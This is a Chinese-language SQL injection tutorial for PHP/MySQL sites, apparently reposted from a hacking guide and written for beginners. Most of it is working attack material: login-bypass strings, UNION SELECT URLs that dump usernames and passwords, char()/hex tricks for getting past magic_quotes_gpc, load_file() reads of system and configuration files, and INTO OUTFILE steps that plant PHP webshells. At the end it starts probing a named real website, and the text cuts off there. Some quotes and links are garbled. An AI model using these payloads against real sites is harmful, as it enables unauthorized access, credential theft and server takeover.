当前位置：文档库 › php注入祥解

php注入祥解

本文主要是为小菜们服务的，如果你已经是一只老鸟呢，可能某些东西会感觉比较乏味，但只要你仔细的看，你会发现很多有趣的东西哦。

阅读此文你只要明白下面的这点东西就够了。

1.明白php+mysql环境是如何搭建的。

2.大概了解php和apache的配置，主要用到php.ini和httpd.conf

而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模式，即让safe_mode = On，还有一个就是返回php执行错误的display_errors 这会返回很多有用的信息，所以我们应该关闭之，即让display_errors＝off 关闭错误显示后，php函数执行错误的信息将不会再显示给用户。

在php的配置文件php.ini中还有一个非常重要的配置选项

magic_quotes_gpc，高版本的默认都是magic_quotes_gpc＝On，只有在原来的古董级的php中的默认配置是magic_quotes_gpc＝Off，可是古董的东西也有人用的哦！

当php.ini中magic_quotes_gpc＝On的时候会有什么情况发生哩，不用惊慌，天是塌不下来的啦！它只是把提交的变量中所有的 ' (单引号), " (双引号), \ (反斜线) 和空字符会自动转为含有反斜线的转义字符，例如把'变成了\',把\变成了\\。

就是这一点，让我们很不爽哦，很多时候我们对字符型的就只好说BYEBYE了，但是不用气馁，我们还是会有好方法来对付它的，往下看咯！

3.有一定的php语言基础和了解一些sql语句，这些都很简单，我们用到的东

西很少，所以充电还来的及哦！

我们先来看看magic_quotes_gpc＝Off的时候我们能干些啥，然后我们再想办法搞一搞magic_quotes_gpc＝On的情况哈

一：magic_quotes_gpc＝Off时的注入

ref="https://www.wendangku.net/doc/4a3368056.html,/hacker" target=_blank>攻击

magic_quotes_gpc＝Off的情况虽然说很不安全，新版本默认也让

magic_quotes_gpc＝On了，可是在很多服务器中我们还发现magic_quotes_gpc ＝Off的情况，例如www.qichi.*。

还有某些程序像vbb论坛就算你配置magic_quotes_gpc＝On，它也会自动消除转义字符让我们有机可乘，所以说 magic_quotes_gpc＝Off的注入方式还是大有市场的。

下面我们将从语法，注入点 and 注入类型几个方面来详细讲解mysql＋php注入A:从MYSQL语法方面先

1。先讲一些mysql的基本语法，算是给没有好好学习的孩子补课了哦~_~ 1）select

SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]

select_expression,...

[INTO {OUTFILE | DUMPFILE} 'file_name' export_options]

[FROM table_references

[WHERE where_definition]

[GROUP BY col_name,...]

[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] ,...] ; ] 常用的就是这些，select_expression指想要检索的列，后面我们可以用where

来限制条件，我们也可以用into outfile将select结果输出到文件中。当然

我们也可以用select直接输出

例如

mysql> select 'a';

+---+

| a |

+---+

| a |

+---+

1 row in set (0.00 sec)

具体内容请看mysql中文手册7.12节

下面说一些利用啦

看代码先

这段代码是用来搜索的哦

.........

SELECT * FROM users WHERE username LIKE ‘%$search%' ORDER BY username .......

这里我们顺便说一下mysql中的通配符，'%'就是通配符，其它的通配符还有'*'

和'_',其中" * "用来匹配字段名，而" % "用来匹配字段值，注意的是%必须与

like一起适用，还有一个通配符，就是下划线" _ "，它代表的意思和上面不同，是用来匹配任何单个的字符的。在上面的代码中我们用到了'*'表示返回的所有字段名，%$search%表示所有包含$search字符的内容。我们如何注入哩？哈哈，和asp里很相似在表单里提交 Aabb%' or 1=1 order by id#注：#在mysql 中表示注释的意思，即让后面的sql语句不执行，后面将讲到。或许有人会问为什么要用or 1＝1呢，看下面，把提交的内容带入到sql语句中成为 SELECT * FROM users WHERE username LIKE ‘%aabb%' or 1=1 order by id# ORDER BY username 假如没有含有aabb的用户名，那么or 1＝1使返回值仍为真，使能返回所有值我们还可以这样在表单里提交%' order by id#或者' order by id# 带入sql语句中成了SELECT * FROM users WHERE username LIKE ‘% %' order by id# ORDER BY username 和SELECT * FROM users WHERE username LIKE ‘%%' order by id# ORDER BY username当然了，内容全部返回。列出所有用户了哟，没准连密码都出来哩。这里就举个例子先，下面会有更精妙的select语句出现，select实际上几乎是无处不在的哦！

2)下面看update咯

Mysql中文手册里这么解释的：

UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,... [WHERE where_definition]

UPDATE用新值更新现存表中行的列，SET子句指出哪个列要修改和他们应该被给定的值，WHERE子句，如果给出，指定哪个行应该被更新，否则所有行被更新。详细内容去看mysql中文手册7.17节啦，在这里详细介绍的话会很罗嗦的哦。由上可知update主要用于数据的更新，例如文章的修改，用户资料的修改，

我们似乎更关心后者，因为......看代码先哦

我们先给出表的结构，这样大家看的明白 CREATE TABLE users (

id int(10) NOT NULL auto

我们构建注入语句吧在输入框输入 a% and 1=2 union select

1,username,3,4,5,6,7,8, password,10,11 from

alphaauthor#放到sql语句中成了

select * from alphadb where title like %a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %

怎么样，出来了吧，哈哈，一切尽在掌握之中。

C：下面我们从注入地点上在来看一下各种注入攻击方式

1) 首先来看看后台登陆哦

代码先

//login.php

.......

$query="select * from alphaauthor where UserName= "

.$HTTP_POST_VARS["UserName"]." and

Password= ". $HTTP_POST_VARS["Password"]." ";

$result=mysql_query($query);

$data=mysql_fetch_array($result);

if ($data)

{

echo "后台登陆成功";

}

esle

{

echo "重新登陆"；

exit；

｝.........

?> Username和password没有经过任何处理直接放到sql中执行了。

看看我们怎么绕过呢？

最经典的还是那个：

在用户名和密码框里都输入

‘or =

带入sql语句中成了

select * from alphaauthor where UserName= or = and Password= or = 这样带入得到的$data肯定为真，也就是我们成功登陆了。

还有其他的绕过方法，原理是一样的，就是想办法让$data返回是真就可以了。我们可以用下面的这些中方法哦

用户名和密码都输入 or a = a

Sql成了

select * from alphaauthor where UserName= or a = a and Password= or a = a

用户名和密码都输入or 1=1 and ‘ =

Sql成了

select * from alphaauthor where UserName= or 1=1 and ‘ =

and Password= or 1=1 and ‘ =

用户名和密码都输入or 2>1 and ‘ =

Sql成了

select * from alphaautho r where UserName= or 2>1 and ‘ =

and Password= or 2>1 and ‘ =

用户名输入 or 1=1 # 密码随便输入

Sql成了

select * from alphaauthor where UserName= or 1＝1 # and Password= anything

后面部分被注释掉了，当然返回还是真哦。

假设admin的id＝1的话你也可以

用户名输入 or id＝1 # 密码随便输入

Sql成了

select * from alphaauthor where UserName= or id＝1 # and Password= anything

怎么样？直接登陆了哦！

俗话说的好，只有想不到没有做不到。

还有更多的构造方法等着课后自己想啦。

2）第二个常用注入的地方应该算是前台资料显示的地方了。

上面已经多次提到了呀，而且涉及了数字型，字符型等等，这里就不再重复了哈。

只是举个例子回顾一下

碧海潮声下载站 - v2.0.3 lite有注入漏洞，代码就不再列出来了

直接看结果

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20se lect%

201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from% 20dl_users

看看，我们又得到我们想要的了

用户名alpha

密码一长串。

为什么我们要把password放在3字段处，把username放在5字段处了，我们上面已经提过了哦，就是我们猜测3和5段显示的应该是字符串型，而与我们要显示的username和password的字段类型应该相同，所以我们这样放了哦。为什么要用18个字段呢？不知道大家还是否记得在union select介绍那里我们提到union必须要求前后select的字段数相同，我们可以通过增加select

的个数来猜测到需要18个字段，只有这样union select的内容才会正常显示哦！

3)其它如资料修改，用户注册的地方主要得有用户等级的应用。

我们在上面讲述update和insert的时候都已经讲到，因为不是很常用，这里就不再阐述，在下面将会提到一些关于update和insert的高级利用技巧。二：下面将要进入magic_quotes_gpc＝On时候的注入攻击教学环节了当magic_quotes_gpc＝On的时候，交的变量中所有的 (单引号),

" (双引号), \ (反斜线) 和空字符会自动转为含有反斜线的转义字符。

这就使字符型注入的方法化为泡影，这时候我们就只能注入数字型且没有Intval()处理的情况了，数字型的我们已经讲了很多了是吧，由于数字型没有用到单引号自然就没有绕过的问题了，对于这种情况我们直接注入就可以了。1）假如是字符型的就必须得像下面这个样子，没有在字符上加引号。

这里我们要用到一些字符串处理函数先，字符串处理函数有很多，这里我们主要讲下面的几个，具体可以参照mysql中文参考手册7.4.10。

char() 将参数解释为整数并且返回由这些整数的ASCII代码字符组

成的一个字符串。当然你也可以用字符的16进制来代替字符，这样也可以的，方法就是在16进制前面加0x，看下面的例子就明白了。 //login.php

......

$query="select * from ".$art_system_db_table[ user ]."

where UserName=$username and Password= ".$Pw." ";

......

假设我们知道后台的用户名是alpha

转化成ASCII后是char(97,108,112,104,97)

转化成16进制是0x616C706861

好了直接在浏览器里输入：

http://localhost/site/admin/login.php?username=char(97,108,112,104,9 7)%23

sql语句变成：

select * from alphaAut

hor where UserName=char(97,108,112,104,97)# and Password= 正如我们期望的那样，他顺利执行了，我们得到我们想要的。

当然咯，我们也可以这样构造

http://localhost/site/admin/login.php?username=0x616C706861%23

sql语句变成：

select * from alphaAuthor where UserName=0x616C706861%23# and Password= 我们再一次是成功者了。很有成就感吧，

或许你会问我们是否可以把#也放在char()里

实际上char(97,108,112,104,97)相当于 alpha

注意是alpha上加引号，表示alpha字符串。

我们知道在mysql中如果执行

mysql> select * from dl_users where username=alpha;

ERROR 1054 (42S22): Unknown column alpha in where clause

看返回错误了。因为他会认为alpha是一个变量。所以我们得在alpha上加引号。

如下

mysql> select * from dl_users where username= alpha ;

这样才是正确的。

如果你把#号也放到那里去了，就成了 alpha#

带入sql语句中

select * from dl_users where username= alpha# ;

当然是什么也没有了，因为连alpha#这个用户都没有。

好，下面我们再来看个例子，

//display.php

......

$query="select * from ".$art_system_db_table[ article ]."

where type=$type;

......

代码根据类型来显示内容，$type没有任何过滤，且没有加引号放入程序中。假设type中含有xiaohua类，xiaohua的char()转换后是

char(120,105,97,111,104,117,97)

我们构建

http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor带入sql语句中为：

select * from ".$art_system_db_table[ article ]."

where type=char(120,105,97,111,104,117,97) and 1=2 union select

1,2,username,4,password,6,7,8,9,10,11 from alphaauthor

看看，我们的用户名和密码照样出来了哦！没有截图，想像一下咯：P

2) 或许有人会问，在magic_quotes_gpc＝On的情况下功能强大的

load_file()还能不能用呢？

这正是我们下面要将的问题了，load_file()的使用格式是load_file(‘文件路径 )我们发现只要把‘文件路径转化成char()就可以了。试试看哦

load_fi le(‘c:/boot.ini )转化成

load_file(char(99,58,47,98,111,111,116,46,105,110,105))

图22

放到具体注入里就是

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20se lect%

201,2,load_file(char

(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14 ,15,16,

17,18

看看，我们看到了boot.ini的内容了哦。

很可惜的是into outfile 不能绕过，不然就更爽了。但是还是有一个地方可以使用select * from table into outfile 那就是....（先卖个关子，下面会告诉你）

三：一些注入技巧，很多都是个人发现哦

1.union select的技巧

UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。在 SELECT 中的select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。

然而有我们可以用下面的方法来猜测列的类型，可是省去很多时间

我们先

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20se lect%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

看看软件描述里写着3，作者里写着4，我们就可以猜测3和4的位置是字符型的，我们再看14前面的是下载次数，这就应该是int型的了，对吧。

好了，我们根据这里来构建吧，估计username和password也是字符型的。试试看哦

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20se lect%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20 from%20dl_users

哈哈，这种方法只要看看就可以大概猜到了。

2.load_file读写文件的技巧

不知道你有没有发现过在我们用load_file()读写php文件时不能在网页中显示。例如：

C:/apache/htdocs/site/lib/sql.inc.php 转化为16进制为：

0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E63 2E706870

我们构造如下

http://localhost/site/display.php?id=

451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F61706163 68652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)

,4,5,6,7,8,9,10,11

发现在文章内容的地方本来该显示sql.inc.php的，可是却空空之，为何呢？我们看看网页的源代码先

哈哈，看看标记的地方，晕死，原来在这里啊，可是为什么哩？

原来html中< >用于标注，哈哈，明白了吧！下次可得记得在哪里找哦。

4. md5的恶梦

山东大学的王博士最近可是搞md5搞的红透了，我们也来搞一搞吧，我们比他更爽，不用计算，哈哈。

md5我们是有办法绕过的，但是并不是哪里都可以，php中的md5函数就不能绕过，因为你输入的所有东西都在里面，根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的，道理相同哦。

看例子先：

//login.php

......

$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";

......

我们直接在浏览器提交

http:/login.php?username=char(97,98)) or 1=1 %23

带入sql语句成为select * from alphaauthor where

UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw."

记得md5里面放的是字符，因为后面有or 1=2，所以我们随便放了个

char(97,98). Ok，登陆成功了哦！看看，md5在我们面前也没有什么用处。

5. 核心技术，利用php+mysql注入漏洞直接写入webshell。。

直接利用注入得到webshell，这应该是大家都很想的吧，下面就教给你。

这里假设你已经知道了网站所在的物理路径，我这里假设网站路径为

c:/apache/htdocs/site。网站的mysql连接信息放在/lib/sql.inc.php里1）适用于magic_quotes_gpc＝Off

假设我们可以上传图片，或者txt，zip，等其它东西，我们把我们的木马改成jpg后缀的，上传后路径为/upload/2004091201.jpg

2004091201.jpg中的内容为

好，我们开始

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20se lect%201,2,load_file( C:/apache/htdocs/site/upload/2004091201.jpg ), 4,5,6,7,8,9,10,11%20into%20outfile C:/apache/htdocs/site/shell.php 因为适用了outfile，所以网页显示不正常，但是我们的任务是完成了。

我们赶快去看看http://localhost/site/shell.php?cmd=dir

爽否？Webshell我们已经创建成功了。看到最前面的12了没？那就是我们select 1，2所输出的！ 2）下面再讲一个适用于magic_quotes_gpc＝On的时候保存webshell的方法哦，显然肯定也能用在于magic_quotes_gpc＝Off的时候啦。我们直接读他的配置文件，用技巧2介绍的方法

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20se lect%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6 C69622F73716C2E696E632E706870)

,4,5,6,7,8,9,10,11

得到sql.inc.php内容为

好了我们知道了mysql的root密码了，我们找到phpmyadmin的后台

http://localhost/phpmyadmin/

用root密码为空登陆。

然后我们新建立一个表结构内容如下：

# 数据表的结构 `te`

CREATE TABLE te (

cmd text NOT NULL

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

# 导出下面的数据库内容 `te`

INSERT INTO te VALUES ( );

Ok，是我们用select * from table into outfile 的时候了

直接在phpmyadmin的sql输入

SELECT * FROM `te` into outfile C:/apache/htdocs/site/cmd1.php ; Ok，成功执行，我们去http://localhost/site/cmd1.php?cmd=dir看看效果去好爽的一个webshell是吧！哈哈，我也很喜欢。

不过不知道大家有没有发现我们是在magic_quotes_gpc＝On的情况下完成这

项工作的，竟然在phpmyadmin里可以不用考虑引号的限制，哈哈，说明什么？说明phpmyadmin太伟大了，这也就是我们在谈magic_quotes_gpc＝On绕过时所卖的那个关子啦！

6.发现没有我们还可以利用update和insert来插入我们的数据，然后来得到我们的webshell哦，还用上面的那个例子，

//reg.php

......

$query = "INSERT INTO members

VALUES( $id , $login , $pass , $email , 2 )" ;

......

我们在email的地方输入

假设我们注册后的id为10

那么我们可以再找到一个可以注入的地方

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20se lect%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile C:/apache/htdocs/site/test.php

好了，我们又有了我们的wenshell了哦。

7.mysql的跨库查询

大家是不是一直听说mysql不能跨库查询啊，哈哈，今天我将要教大家一个好方法，通过这个方法来实现变相的跨库查询，方法就是通过load_file来直接读出mysql中dat

a文件夹下的文件内容，从而实现变态跨库查询。

举个例子啦

在这之前我们先讲一下mysql的data文件夹下的结构

Data文件夹下有按数据库名生成的文件夹，文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件，例如

Mysql中有alpha数据库，在alpha库中有alphaauthor和alphadb两个表，Alpha文件夹内容如下图33

其中alphadb.frm放着lphadb表中的数据，alphadb.frm放着表的结构，alphadb.myi中放的内容随mysql的版本不通会有所不同，具体可以自己用记事本打开来判断。

实验开始

假设我们知道有另外的一个数据库yminfo210存在，且存在表user，user中放这admin的信息。

我们

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20se lect%201,2,load_file( yminfo210/user.myd ),4,5,6,7,8,9,10,11

说明一下，load_file默认所在的目录是mysql下的data目录，所以我们用load_file( yminfo210/user.myd )，当然load_file( .info210/user.myd )也是一样的，注意的是into outfile的默认路径是在所在的数据库文件夹下。我们看读出来的内容

舼? ? admin 698d51a19d8a121ce581499d7b701668

admin@https://www.wendangku.net/doc/4a3368056.html,admin question admin

answer https://www.wendangku.net/doc/4a3368056.html, (?靃? KA靃?靃? 127.0.0.1 d|?? ? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@https://www.wendangku.net/doc/4a3368056.html, sdfasdfsdfa asdfadfasd ?E麷AM麷A 127.0.0.1 222 222222223423

虽然乱码一堆，但是我们还是可以看出用户名是admin，密码是

698d51a19d8a121ce581499d7b701668，后面其它的是另外的信息。

通过这种方法我们就实现了曲线跨库，下面的例子中也会提到哦！

说了这么多下面我们来具体的使用一次，这次测试的对象是国内一著名安全类站点――黑白网络

听人家说黑白有漏洞？我们一起去看看吧。

https://www.wendangku.net/doc/4a3368056.html,/down/show.php?id=5403%20and%201=1

正常显示。

https://www.wendangku.net/doc/4a3368056.html,/down/show.php?id=5403%20and%201=2

显示不正常。

好，我们继续

https://www.wendangku.net/doc/4a3368056.html,/down/show.php?id=5403%20and%201=1 union select 1

显示结果如下